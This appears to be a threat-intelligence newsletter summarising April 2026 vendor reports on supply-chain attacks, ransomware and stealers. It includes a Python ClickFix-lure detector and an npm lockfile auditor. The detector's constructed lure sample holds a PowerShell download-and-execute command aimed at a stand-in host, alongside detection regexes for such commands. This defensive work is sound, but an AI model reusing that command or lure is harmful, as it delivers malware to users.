
Welcome to your biweekly digest of curated cybersecurity intelligence.

Every two weeks, we bring you expert insights and handpicked articles covering the latest threats, threat actor activity, vulnerabilities, incident trends, and defensive strategies. Whether you’re on the front lines or shaping your organization’s security posture, Security Signals delivers the information you need to stay informed and ready.

For more articles, check out our #onpatrol4malware blog.


March 2026 Edition

Key stats from real-world telemetry and live attack observations over the past month – a concise look at what we’re seeing across malware, phishing, ransomware, C2s, and domain abuse.

This Edition’s Articles

Early April 2026 Cyber Threat Reports spotlights a fast-changing threat landscape shaped by Medusa ransomware activity, the Axios npm compromise and malicious PyPI packages, EvilTokens-driven BEC fraud, campaigns using the Claude Code source leak as a lure, abuse of SaaS notification pipelines, and attacks on exposed Kubernetes environments. Together these reports show how quickly attackers are scaling social engineering, open-source compromise, credential theft, and cloud-focused intrusion across real-world environments.

AppsFlyer Supply Chain Attack Analysis

Source: Reflectiz
(Published: 26 March 2026)
Researchers uncovered a supply chain attack targeting AppsFlyer, where malicious code was injected into third-party integrations to compromise downstream users. Read more.


Axios NPM Package Compromised: Supply Chain Attack Hits JavaScript HTTP Client

Source: Trend Micro
(Published: 28 March 2026)
A compromised Axios npm package introduced malicious code into a widely used JavaScript HTTP client, impacting downstream applications and developers. Read more.


The Axios Breach: When NPM Trust Becomes an APT Attack Vector

Source: PolySwarm
(Published: 31 March 2026)
The Axios compromise demonstrates how trust in a widely used open-source package can be turned into an APT attack vector within the software supply chain. Read more.


EvilTokens: An AI-Augmented Phishing-as-a-Service for Automating BEC Fraud (Part 2)

Source: Sekoia
(Published: 01 April 2026)
EvilTokens is an AI-augmented phishing-as-a-service platform designed to automate business email compromise attacks and streamline credential harvesting operations. Read more.


BYOVD Ransomware Attacks Now Capable of Defeating Every Major EDR Product

Source: CyberSec Sentinel
(Published: 01 April 2026)
Threat actors are increasingly using bring-your-own-vulnerable-driver (BYOVD) techniques, loading a signed but exploitable driver to gain kernel-level access, to disable endpoint detection and response products before deploying ransomware. Read more.


Supply Chain Attacks Surge in March 2026

Source: Zscaler
(Published: 01 April 2026)
Researchers observed a significant increase in supply chain attacks throughout March 2026, targeting open-source ecosystems and developer pipelines. Read more.


ClickFix Detection With YARA Rules

Source: ReversingLabs
(Published: 01 April 2026)
ReversingLabs shares YARA rules for detecting ClickFix lures, the social-engineering technique that tricks users into copying an attacker-supplied command and running it themselves (typically via the Windows Run dialog). Read more.
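As an added example for the ClickFix entry above (not ReversingLabs' YARA rule set and not code from the page), the Python scanner below applies the same idea: it scores page content on the textual hallmarks that co-occur in a ClickFix lure (a clipboard write, "Win+R / Ctrl+V / Enter" instructions, a PowerShell or mshta command, a fake human-verification prompt) and extracts the command the victim is being told to run. Both HTML snippets, the weights and the threshold are constructed for this example.

```python
# Added example: score page content for ClickFix lure hallmarks. Not
# ReversingLabs' rules and not code from the page. The two HTML snippets,
# weights and threshold below are constructed for the example.
import re

# Hallmarks that co-occur in ClickFix lures, each with a weight. One hit alone
# (e.g. a clipboard write behind a "copy" button on a docs page) is not enough;
# the combination is what makes a page suspicious.
INDICATORS = [
    ("clipboard_write",
     re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I), 3),
    ("run_dialog_instruction",
     re.compile(r"\bwin(dows)?\s*(\+|key)\s*r\b|\brun\s+dialog\b", re.I), 2),
    ("paste_instruction",
     re.compile(r"\bctrl\s*\+\s*v\b|\bpaste\b", re.I), 1),
    ("shell_command",
     re.compile(r"\b(powershell(\.exe)?|pwsh)\b[^\"'<]*"
                r"(-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|"
                r"invoke-expression|\birm\b|downloadstring)"
                r"|\bmshta(\.exe)?\s+https?://|\bcmd(\.exe)?\s*/c\b", re.I), 3),
    ("fake_verification",
     re.compile(r"verify (that )?you are human|i'?m not a robot|captcha", re.I), 1),
]

THRESHOLD = 6  # clipboard write plus a shell command already reaches this


def score_page(html: str) -> dict:
    """Return the matched indicator names, the weighted score and a verdict."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(html)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"hits": hits, "score": score, "suspicious": score >= THRESHOLD}


def extract_clipboard_command(html: str):
    """Return the string literal passed to navigator.clipboard.writeText, if any.

    That literal is the command the victim is tricked into running and is the
    artefact to pivot on (hosts, URLs, encoded payloads). Returns None when the
    argument is not a literal (e.g. read from a DOM element)."""
    m = re.search(r"writeText\(\s*(['\"`])(.*?)\1\s*\)", html, re.S)
    return m.group(2) if m else None


# Constructed lure: fake verification page that copies a command and tells
# the user to run it. example.invalid is a reserved, non-resolving domain.
LURE_HTML = """<html><body>
<h2>Verify you are human</h2>
<p>To continue, complete these steps:</p>
<ol><li>Press Win + R</li><li>Press Ctrl + V</li><li>Press Enter</li></ol>
<script>
function go(){ navigator.clipboard.writeText('powershell -w hidden -c "iex (irm https://example.invalid/a)"'); }
</script>
<button onclick="go()">I'm not a robot</button>
</body></html>"""

# Constructed benign page: a docs page with an ordinary copy-to-clipboard button.
BENIGN_HTML = """<html><body>
<h2>Installation</h2>
<p>Copy the command and paste it into your terminal:</p>
<pre id="cmd">pip install requests</pre>
<button onclick="navigator.clipboard.writeText(document.getElementById('cmd').innerText)">Copy</button>
</body></html>"""


if __name__ == "__main__":
    for label, page in (("lure", LURE_HTML), ("benign", BENIGN_HTML)):
        print(label, score_page(page), extract_clipboard_command(page))
```

The benign page still scores (clipboard write plus the word "paste") but stays under the threshold, which is the point of weighting co-occurring indicators rather than alerting on any one of them. Point the same logic at proxy-captured HTML or at the `script` bodies a sandbox records, and treat the extracted command as the indicator to hunt for in process-creation telemetry.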


NightSpire Ransomware Analysis

Source: Huntress
(Published: 02 April 2026)
NightSpire ransomware has emerged as a new threat, using multi-stage execution and stealthy techniques to evade detection and encrypt victim systems. Read more.


CrystalX RAT With Prankware Features

Source: Kaspersky Securelist
(Published: 02 April 2026)
Researchers identified CrystalX RAT, a remote access trojan that combines espionage capabilities with disruptive prankware features targeting victims. Read more.


Iran, US, and Israel Cyberwar Analysis 2026

Source: Seqrite
(Published: 02 April 2026)
Analysts highlight escalating cyber conflict activity involving Iran, the United States, and Israel, with increased targeting of critical infrastructure and government entities. Read more.


The Axios Breach: Plain Crypto JS Compromises Packages

Source: Resecurity
(Published: 02 April 2026)
A supply chain malware incident involving compromised crypto libraries demonstrates how attackers can poison widely used packages to distribute malicious code. Read more.


Hermes PyPI Package Analysis

Source: JFrog Security Research
(Published: 02 April 2026)
JFrog researchers analyzed a malicious PyPI package named Hermes that steals sensitive data from AI-related workflows and developer environments. Read more.


A Technique-Based Approach to Hunting Web-Delivered Malware

Source: Censys
(Published: 02 April 2026)
Researchers outline a technique-driven methodology for detecting and tracking malware delivered via web-based attack chains. Read more.


Weaponizing Trust Signals: Claude Code Lures and GitHub Release Payloads

Source: Trend Micro
(Published: 03 April 2026)
A packaging error in Anthropic’s Claude Code npm release briefly exposed internal source code, which threat actors rapidly weaponized to distribute Vidar and GhostSocks malware via fake GitHub repositories. Read more.


Weaponizing SaaS Notification Pipelines

Source: Cisco Talos
(Published: 03 April 2026)
Threat actors are abusing SaaS notification systems to deliver malicious payloads and bypass traditional security controls. Read more.


ComfyUI Servers Abused in Cryptomining Proxy Botnet

Source: Censys
(Published: 03 April 2026)
Exposed ComfyUI servers are being leveraged as part of a cryptomining proxy botnet, enabling attackers to route malicious traffic through compromised infrastructure. Read more.


Reddit and TradingView Lures Lead to Vidar and Amos Stealers

Source: HexaStrike
(Published: 03 April 2026)
Threat actors are using Reddit and TradingView-themed lures to distribute Vidar and Amos stealer malware to unsuspecting users. Read more.


Team PCP Strikes Again: Telnyx Library Supply Chain Compromise

Source: JFrog Security Research
(Published: 03 April 2026)
Threat actor Team PCP continues supply chain attacks by compromising a widely used Telnyx library to inject malicious functionality. Read more.


CIFRAT Malware Analysis

Source: CERT Polska
(Published: 03 April 2026)
CERT Polska analyzed CIFRAT malware, highlighting its modular design and capabilities for credential theft and remote control. Read more.


Axios Supply Chain Compromise: Detection and Response

Source: Elastic Security Labs
(Published: 03 April 2026)
Elastic provides detection strategies and telemetry insights for identifying malicious activity stemming from the Axios npm supply chain compromise. Read more.
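The Axios entries above all come back to the same first question for a defender: is a compromised version of the package anywhere in our dependency tree, including nested copies? As an added example (not Elastic's, Datadog's or the Axios project's code), the script below audits an npm package-lock.json against a denylist of package@version pairs and also flags entries fetched from a non-registry host or carrying no integrity hash. It handles the flat "packages" map of lockfileVersion 2 and 3 as well as the nested "dependencies" tree of lockfileVersion 1, so it is more general than the single Axios case. The lockfile contents and the version "9.9.9-example" are constructed; substitute the versions named in the linked advisories.

```python
# Added example: audit an npm package-lock.json against a denylist of
# compromised package@version pairs, and flag entries whose "resolved" URL is
# not the public registry or that carry no "integrity" hash. Not Elastic's,
# Datadog's or the Axios project's code. The lockfile text and the version
# "9.9.9-example" are constructed; the real affected versions are in the
# linked advisories.
import json
from urllib.parse import urlparse

# Placeholder denylist entry, not a real compromised version.
DENYLIST = {("axios", "9.9.9-example")}
REGISTRY_HOSTS = {"registry.npmjs.org"}


def iter_lock_entries(lock: dict):
    """Yield (path, name, version, metadata) for every installed package.

    lockfileVersion 2 and 3 keep a flat "packages" map keyed by install path;
    lockfileVersion 1 nests "dependencies". Both are walked so that nested
    copies (node_modules/a/node_modules/axios) are not missed."""
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            if not path:  # "" is the root project itself
                continue
            # Aliased installs carry an explicit "name"; otherwise derive it
            # from the path, which keeps scoped names like @scope/pkg intact.
            name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
            yield path, name, meta.get("version"), meta
        return

    def walk(deps, prefix):
        for name, meta in deps.items():
            path = f"{prefix}node_modules/{name}"
            yield path, name, meta.get("version"), meta
            yield from walk(meta.get("dependencies", {}), path + "/")

    yield from walk(lock.get("dependencies", {}), "")


def audit_lockfile(lock_text: str, denylist=DENYLIST):
    """Return sorted (path, reason, detail) findings for a lockfile's text."""
    findings = []
    for path, name, version, meta in iter_lock_entries(json.loads(lock_text)):
        if (name, version) in denylist:
            findings.append((path, "denylisted", f"{name}@{version}"))
        resolved = meta.get("resolved", "")
        if resolved:
            if urlparse(resolved).hostname not in REGISTRY_HOSTS:
                findings.append((path, "non_registry_source", resolved))
            if not meta.get("integrity"):
                findings.append((path, "missing_integrity", f"{name}@{version}"))
    return sorted(findings)


# Constructed lockfileVersion 3 sample: one denylisted copy at the top level
# and a second, nested copy pulled from a non-registry host without a hash.
SAMPLE_LOCK_V3 = json.dumps({
    "name": "demo-app", "version": "1.0.0", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0",
             "dependencies": {"axios": "9.9.9-example", "some-lib": "2.0.0"}},
        "node_modules/axios": {
            "version": "9.9.9-example",
            "resolved": "https://registry.npmjs.org/axios/-/axios-9.9.9-example.tgz",
            "integrity": "sha512-constructedplaceholder"},
        "node_modules/follow-redirects": {
            "version": "1.15.0",
            "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.0.tgz",
            "integrity": "sha512-constructedplaceholder"},
        "node_modules/some-lib": {
            "version": "2.0.0",
            "resolved": "https://registry.npmjs.org/some-lib/-/some-lib-2.0.0.tgz",
            "integrity": "sha512-constructedplaceholder"},
        "node_modules/some-lib/node_modules/axios": {
            "version": "9.9.9-example",
            "resolved": "https://example.invalid/mirror/axios-9.9.9-example.tgz"},
    },
})

# Constructed lockfileVersion 1 sample with the denylisted copy nested.
SAMPLE_LOCK_V1 = json.dumps({
    "name": "legacy-app", "lockfileVersion": 1,
    "dependencies": {
        "some-lib": {
            "version": "2.0.0",
            "resolved": "https://registry.npmjs.org/some-lib/-/some-lib-2.0.0.tgz",
            "integrity": "sha512-constructedplaceholder",
            "dependencies": {
                "axios": {
                    "version": "9.9.9-example",
                    "resolved": "https://registry.npmjs.org/axios/-/axios-9.9.9-example.tgz",
                    "integrity": "sha512-constructedplaceholder"}}}}})


if __name__ == "__main__":
    for finding in audit_lockfile(SAMPLE_LOCK_V3) + audit_lockfile(SAMPLE_LOCK_V1):
        print(*finding)
```

Run it over every lockfile in a monorepo or CI cache rather than only the root one; the nested-copy case is exactly where a pinned root version gives false comfort. A non-registry `resolved` URL or a missing `integrity` on a registry package is worth a look on its own, independent of any denylist.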


The Scanner Was the Weapon: DevSecOps Supply Chain Attacks

Source: CloudSEK
(Published: 03 April 2026)
CloudSEK documents long-term supply chain attacks targeting DevSecOps infrastructure through malicious scanning tools and automation pipelines. Read more.


Contagious Interview Campaign Spreads Across 5 Ecosystems

Source: Socket
(Published: 04 April 2026)
The Contagious Interview campaign has expanded across multiple software ecosystems, distributing malicious packages designed to steal credentials and deploy backdoors. Read more.


Malicious Hermes PyPI Package Steals AI Conversation Data

Source: SafeDep
(Published: 04 April 2026)
A malicious PyPI package disguised as Hermes has been discovered stealing sensitive AI-generated conversation data from developers. Read more.


Modern Kubernetes Threat Landscape

Source: Unit 42 (Palo Alto Networks)
(Published: 04 April 2026)
Unit 42 outlines evolving threats targeting Kubernetes environments, including misconfigurations, exposed services, and supply chain vulnerabilities. Read more.


DPRK Malware: Modularity, Diversity, and Functional Specialization

Source: DomainTools
(Published: 04 April 2026)
Researchers detail how DPRK-linked malware ecosystems are evolving with modular architectures and specialized tooling for targeted campaigns. Read more.


Tax Season 2026: Cybercriminal Campaign Preparation

Source: Check Point
(Published: 04 April 2026)
Cybercriminals are preparing tax-themed phishing campaigns months in advance, leveraging seasonal lures to maximize victim engagement. Read more.


Tycoon 2FA Infrastructure Update Following Global Takedown

Source: eSentire
(Published: 04 April 2026)
Threat actors behind Tycoon 2FA phishing infrastructure have adapted their operations following disruption efforts by global law enforcement coalitions. Read more.


Anthropic Claude Code Leak: Security Implications

Source: Zscaler
(Published: 04 April 2026)
Zscaler analyzes the security risks introduced by the Claude Code leak and how attackers are leveraging it in active campaigns. Read more.


A Little Bit Pivoting: What Web Shells Are Attackers Looking For

Source: SANS ISC
(Published: 05 April 2026)
Attackers are actively probing web servers for known web shell paths, looking for already-planted shells they can reuse for lateral movement and pivoting within compromised environments. Read more.


Malicious Strapi Plugin Deploys Command-and-Control Agent

Source: SafeDep
(Published: 05 April 2026)
A malicious npm plugin targeting Strapi deployments installs a command-and-control agent to maintain persistence within compromised environments. Read more.


Qilin Ransomware EDR Killer Analysis

Source: Cisco Talos
(Published: 05 April 2026)
Cisco Talos examines how Qilin ransomware incorporates EDR-killing techniques to disable security defenses prior to encryption. Read more.


Fake Installers Deliver Monero Mining Malware

Source: Elastic Security Labs
(Published: 05 April 2026)
Elastic researchers identified campaigns distributing fake software installers that deploy Monero cryptomining malware on infected systems. Read more.


Axios NPM Supply Chain Compromise Analysis

Source: Datadog Security Labs
(Published: 05 April 2026)
Datadog researchers provide detailed analysis of the Axios npm compromise and its impact on developer ecosystems and production environments. Read more.


Storm-1175 Targets Vulnerable Web-Facing Assets in Medusa Ransomware Operations

Source: Microsoft
(Published: 06 April 2026)
Microsoft observed Storm-1175 conducting high-tempo ransomware operations by exploiting vulnerable internet-facing assets to deploy Medusa ransomware. Read more.


Business Email Compromise Fraud Becomes More Accessible

Source: Cisco Talos
(Published: 06 April 2026)
The democratization of business email compromise is lowering the barrier to entry, enabling more threat actors to launch sophisticated fraud campaigns. Read more.


Understanding the Axios NPM Compromise

Source: Endor Labs
(Published: 06 April 2026)
Endor Labs examines how the Axios compromise unfolded and what it reveals about modern supply chain attack techniques. Read more.


Phantom Stealer: Credential Theft Campaign Analysis

Source: Group-IB
(Published: 06 April 2026)
Phantom Stealer is being distributed through phishing campaigns to harvest credentials and sensitive user data across multiple platforms. Read more.


Claude Code Packaging Error Remains a Lure in an Active Campaign: What Defenders Should Do

Source: Trend Micro
(Published: 07 April 2026)
Threat actors continue to exploit the Claude Code packaging error as a lure, distributing Vidar, GhostSocks, and PureLog stealer malware through malicious GitHub releases. Read more.


Cybersecurity Advisory AA26-097A

Source: CISA
(Published: 07 April 2026)
CISA released advisory AA26-097A detailing ongoing threat activity and providing guidance for detecting and mitigating active cyber threats affecting organizations. Read more.


Mamont Banking Trojan: Android Malware Analysis

Source: NCC Group
(Published: 07 April 2026)
NCC Group analyzes Mamont, an Android banking trojan designed to steal financial data and credentials from infected mobile devices. Read more.


Want more articles? Check out the previous edition of Security Signals here. 
